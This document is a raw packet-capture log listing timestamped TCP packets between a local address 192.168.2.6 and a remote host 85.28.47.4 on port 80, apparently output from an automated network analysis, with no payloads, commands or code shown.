                                                                Jun 27, 2024 05:58:11.529850006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529854059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529865980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529874086 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529877901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529887915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529898882 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529901028 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529911041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529917955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529922009 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529927969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529939890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529949903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529949903 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529962063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529972076 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.529974937 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.529985905 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.530030012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.530030012 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.530046940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.530747890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.530760050 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.530771017 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.530782938 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.530795097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.530807018 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.530807018 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.530818939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.530822992 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.530831099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.530843019 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.530843019 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.530862093 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.530874968 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.612659931 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.612692118 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.612703085 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.612799883 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.612812042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.612809896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.612823009 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.612834930 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.612854958 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.612864017 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.612991095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613030910 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.613118887 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613131046 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613142014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613154888 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613159895 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.613167048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613178968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613192081 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.613210917 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.613389969 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613400936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613411903 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613421917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613430977 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.613452911 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.613455057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613466978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613477945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613487005 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.613490105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613502026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613512039 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.613535881 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.613894939 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613907099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613918066 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613929987 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.613931894 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.613955021 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.613979101 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614012003 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614047050 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614149094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614161968 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614181995 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614197969 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614267111 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614279032 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614289999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614300966 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614301920 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614317894 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614341974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614537954 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614550114 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614559889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614569902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614573956 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614583015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614592075 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614593983 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614604950 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614617109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614619017 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614634037 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614636898 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614648104 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.614660978 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.614679098 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.615138054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615168095 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615178108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615190029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615200996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615202904 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.615212917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615216017 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.615223885 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615235090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615245104 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.615246058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615257025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615269899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615272999 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.615281105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615292072 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615294933 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.615303993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615310907 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.615314960 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615325928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615329981 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.615339041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615350962 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.615360975 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.615386963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.616127014 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616139889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616151094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616163015 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616172075 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.616174936 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616187096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616194010 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.616197109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616209030 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616209984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.616219997 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616230965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616235971 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.616241932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616254091 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616264105 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.616265059 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616276979 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616282940 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.616288900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616298914 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.616301060 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616312027 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616328955 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.616333961 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.616354942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.616367102 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.617120028 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617134094 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617145061 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617156029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617166996 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617167950 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.617178917 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617189884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617197037 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.617202044 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617212057 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.617212057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617223978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617235899 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617243052 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.617247105 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617259026 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617269993 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617271900 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.617281914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617290974 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.617292881 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617304087 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617311954 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.617317915 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.617325068 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.617351055 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.618045092 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.618057966 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.618067980 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.618079901 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.618089914 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.618092060 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.618102074 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.618113041 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.618113041 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.618127108 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.618128061 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.618138075 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.618146896 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.618150949 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.618163109 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.618175030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.618204117 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.699512005 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.699546099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.699599981 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.699611902 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.699613094 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.699654102 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.699660063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.699660063 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.699687004 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.699749947 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.699762106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.699784994 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.699803114 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.699873924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.699884892 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.699896097 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.699907064 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.699914932 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.699924946 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.699949980 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.700108051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700136900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700145006 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.700156927 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700167894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700170040 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.700180054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700191021 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700197935 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700212002 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.700238943 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.700428963 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700440884 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700450897 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700467110 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.700474024 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700494051 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700504065 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.700505972 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700515985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.700517893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700530052 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700544119 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.700570107 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.700938940 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700951099 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700961113 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700973034 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700983047 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.700985909 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.700999022 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701009989 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701010942 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701020956 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701031923 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701044083 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701045036 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701062918 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701076984 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701571941 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701582909 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701592922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701603889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701616049 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701627016 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701630116 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701647043 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701652050 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701658010 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701668978 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701679945 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701679945 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701693058 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701697111 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701704025 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701714993 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701716900 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701728106 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701738119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701744080 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701747894 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701760054 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701770067 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701772928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.701788902 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.701807976 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.702532053 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702544928 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702553988 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702564955 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702575922 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702584028 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.702588081 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702600002 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702605963 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.702610970 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702622890 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702624083 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.702634096 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702645063 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702655077 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.702655077 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702666998 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702677965 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702683926 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.702691078 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702702999 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.702713013 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.702740908 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.703318119 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703329086 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703341007 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703358889 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703361034 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.703371048 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703381062 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703392029 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703402042 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703408003 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.703419924 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703427076 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703428030 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.703432083 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703437090 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703448057 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703458071 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703464985 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.703469992 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703480959 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703480959 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.703491926 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703502893 CEST804971185.28.47.4192.168.2.6
                                                                Jun 27, 2024 05:58:11.703509092 CEST4971180192.168.2.685.28.47.4
                                                                Jun 27, 2024 05:58:11.703538895 CEST4971180192.168.2.685.28.47.4
